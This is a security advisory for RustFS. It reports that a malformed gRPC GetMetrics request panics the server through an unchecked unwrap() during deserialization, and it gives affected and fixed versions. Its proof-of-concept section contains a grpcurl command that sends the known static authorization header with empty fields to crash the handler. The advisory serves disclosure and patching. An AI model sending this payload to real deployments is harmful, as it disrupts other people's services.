Description
RustFS gRPC GetMetrics deserialization panic enables remote DoS
Summary
A malformed gRPC GetMetrics request causes get_metrics to unwrap() failed deserialization of metric_type/opts, panicking the handler thread and enabling remote denial of service of the metrics endpoint.
Details
- Vulnerable code: rustfs/src/storage/tonic_service.rs:1775-1782: MetricType and CollectMetricsOpts are deserialized with Deserialize::deserialize(...).unwrap() from client-supplied bytes.
- Malformed metric_type/opts (e.g., empty or truncated rmp-serde payloads) trigger InvalidMarkerRead and panic.
- Reachability: same TCP listener as S3 (default :9000); only a static interceptor token authorization: rustfs rpc is checked in server/http.rs:677.
- Impact scope: panic terminates the worker handling the request, causing metrics service interruption and potential process instability.
PoC
rustfs-grpc-metrics-invalid-metric-type-panic-poc.tar.gz
- Start RustFS (example local dev):
mkdir -p /tmp/rustfs-data1 /tmp/rustfs-data2
RUSTFS_ACCESS_KEY=devadmin RUSTFS_SECRET_KEY=devadmin \
cargo run --bin rustfs -- --address 0.0.0.0:9000 \
/tmp/rustfs-data1 /tmp/rustfs-data2
- From rustfs-grpc-metrics-invalid-metric-type-panic-poc/, run:
ENDPOINT=127.0.0.1:9000 make run
# or: grpcurl -plaintext \
# -H 'authorization: rustfs rpc' \
# -import-path ../crates/protos/src -proto node.proto \
# -d '{"metric_type":"","opts":""}' \
# 127.0.0.1:9000 node_service.NodeService/GetMetrics
- Observe panic in server logs at tonic_service.rs:get_metrics with InvalidMarkerRead and worker crash; client output saved to poc-response.txt/poc-grpcurl.log.
Impact
- Vulnerability type: remote unauthenticated (static token) denial of service via panic in gRPC handler.
- Who is impacted: any deployment exposing the gRPC endpoint where an attacker can reach port 9000 and supply the known authorization: rustfs rpc header; metrics service is disrupted and may affect overall stability depending on runtime crash handling.
Packages
Name: rustfs (ecosystem: rust)
Affected versions: >= 1.0.0-alpha.13, <= 1.0.0-alpha.77
Fixed version: 1.0.0-alpha.78
Related vulnerabilities
CVSS3: 4
nvd
about 1 month ago
RustFS is a distributed object storage system built in Rust. In versions 1.0.0-alpha.13 to 1.0.0-alpha.77, a malformed gRPC GetMetrics request causes get_metrics to unwrap() failed deserialization of metric_type/opts, panicking the handler thread and enabling remote denial of service of the metrics endpoint. This issue has been patched in version 1.0.0-alpha.78.